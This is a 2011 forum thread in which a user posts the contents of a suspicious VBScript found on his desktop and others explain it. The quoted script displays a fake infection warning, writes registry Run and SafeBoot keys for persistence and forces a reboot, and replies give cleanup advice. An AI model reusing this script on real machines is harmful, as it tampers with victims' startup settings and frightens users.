I have an unfamiliar test.vbs.txt file on my desktop what should I do?

Discussion in 'malware problems & news' started by MrGump, Oct 7, 2011.

Thread Status:
Not open for further replies.
  1. MrGump

    MrGump Registered Member

    Joined:
    Sep 5, 2009
    Posts:
    406
    i wont double click it as I assume this will run whatever is in it but i did right click and edit it and this is what i see:

    Code:
    rem generated by zerokool
    rem written 06-oct-2011
    
    Msgbox "ERROR",32, "INFECTED!"
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set File = fso.CreateTextFile ("C:\virus.html", True)
    File.WriteLine("<head>")
    File.WriteLine("<title> WARNING VIRUS DETECTED</title>")
    File.WriteLine("</head>")
    FileWriteLine("Warning a virus has been detected on your system.")
    
    Dim WshShell, bKey
    Set WshShell = WScript.CreateObject("WScript.Shell")
    WshShell.RegWrite "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\phuhrenzix", 1, "REG_BINARY" 
    WshShell.RegWrite "HKLM\system\currentcontrolset\control\safeboot\minimal\phuhrenzix", "C:\virus.html", "REG_SZ"
    WshShell.RegWrite "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\network\phuhrenzix", 1, "REG_BINARY" 
    WshShell.RegWrite "HKLM\system\currentcontrolset\control\safeboot\network\phuhrenzix", "C:\virus.html", "REG_SZ"
    
    WshShell.RegWrite "HKLM\SOFTWARE\Microsoft\CurrentVersion\Run\phuhrenzix", 1, "REG_BINARY" 
    WshShell.RegWrite "HKLM\SOFTWARE\Microsoft\CurrentVersion\Run\phuhrenzix", "C:\virus.html", "REG_SZ"
    Set objShell = CreateObject("Wscript.Shell")
    objShell.Run "virus.html"
    
    Dim objShell
    Set objShell = WScript.CreateObject("WScript.Shell")
    objShell.Run "shutdown /r /t 0"
    is this some kind of hoax? *puppy*

    did it get past my AV?
     
    Last edited: Oct 7, 2011
  2. kjempen

    kjempen Registered Member

    Joined:
    May 6, 2004
    Posts:
    379
    I'm no expert when it comes to Visual Basic, but the visual basic script seems to pop up a message box and create a web page ("virus.html") that gets opened even in safe mode (because it modifies your Windows registry). The web page displays a warning message that your pc is infected by a virus. Looks a lot like a rogue/fake antivirus is (or has been) installed on your system. You should do a scan with Malwarebytes Anti-Malware.

    EDIT: Probably a good idea to go through your Windows registry and make sure no registry keys with the word "phuhrenzix" are left.
     
  3. xxJackxx

    xxJackxx Registered Member

    Joined:
    Oct 23, 2008
    Posts:
    4,607
    Location:
    USA
    If the final extension is .txt then it shouldn't be able to do anything. I would still check the registry as suggested above and make sure that virus.html does not exist on your c: drive. Scan as suggested and delete the file.
     
  4. MrGump

    MrGump Registered Member

    Joined:
    Sep 5, 2009
    Posts:
    406
    thanks to you both
     
Loading...
Thread Status:
Not open for further replies.
  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.